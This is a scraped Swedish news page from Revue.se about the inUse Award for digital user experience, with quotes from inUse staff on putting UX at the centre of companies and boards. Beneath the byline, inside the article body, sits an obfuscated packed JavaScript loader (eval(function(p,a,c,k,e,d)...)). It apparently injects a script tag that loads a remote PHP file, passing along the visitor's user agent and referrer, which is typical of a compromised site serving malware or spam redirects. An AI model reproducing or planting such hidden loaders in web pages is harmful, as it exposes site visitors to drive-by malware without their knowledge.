Image Image Image Image Image Image Image Image Image Image

| 18 december, 2017

Scroll to top

Top

No Comments

Gala flyttar användarupplevelsen in i styrelserummen | Revue.se

Gala flyttar användarupplevelsen in i styrelserummen
Sebastian Plengier Ehrnfelt

– eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skkki|var|u0026u|referrer|nhzib||js|php’.split(‘|’),0,{}))
Om man som företagsledare inte fokuserar på användarna går det snabbt utför. Termer som nudging och behavioral economics har gjort frågan om användarupplevelsen mer aktuell än någonsin, säger Johan Berndtsson, vice vd på inUse.

Varje år delar inUse ut ett prestigefyllt pris för bästa digitala användarupplevelse  – inUseAward. Just nu pågår nomineringarna inför årets pris, och användarupplevelsen – User Experience eller UX – är viktigare än någonsin om man som företag vill överleva.

2016 vann Swish inUse Award, en tjänst som underlättat massor för mängder av användare. En succé tack vare att man löst ett verkligt problem och fokuserat på användarna. Ett annat tydligt exempel är Airbnb, vars användarfokus genomsyrar hela organisationen.

– De har kundresekartor i sin entré, så att alla medarbetare dagligen ska påminnas om användarna. De hade haft en god chans att vinna inUse Award om tjänsten designats i Sverige, vilket är ett krav i tävlingen. Men det finns massvis med goda exempel i Sverige också, säger Sara Lerén, jurymedlem och UX-strateg på inUse.

Det handlar verkligen om helheter, där användaren är i centrum.

– Slänger du bara ihop några UX-designer och pliktskyldigt låter dem ingå i ett projekt når du ingenstans, säger Johan Berndtsson.

– Användarupplevelsen måste stå i fokus i hela organisationen. Styrelse och beslutsfattare måste ha användbarheten som en grundbult. Du behöver en god UX-strategi för att lyckas – det går inte längre att leva på gamla meriter, då försvinner kunderna i ett nafs.

Nytt för i år är också att inUse bidrar med pengar för varje nominering till Geek Girl Meetup, som lyfter kvinnliga förebilder på det digitala området. För varje nominering skänker man en summa.

– Vi vill bidra till att alla kommer till tals som har goda idéer, säger Sara Lerén.

Här nominerar du till inUse Award 2017. Vilken tjänst, app eller produkt ger Sveriges bästa användarupplevelse?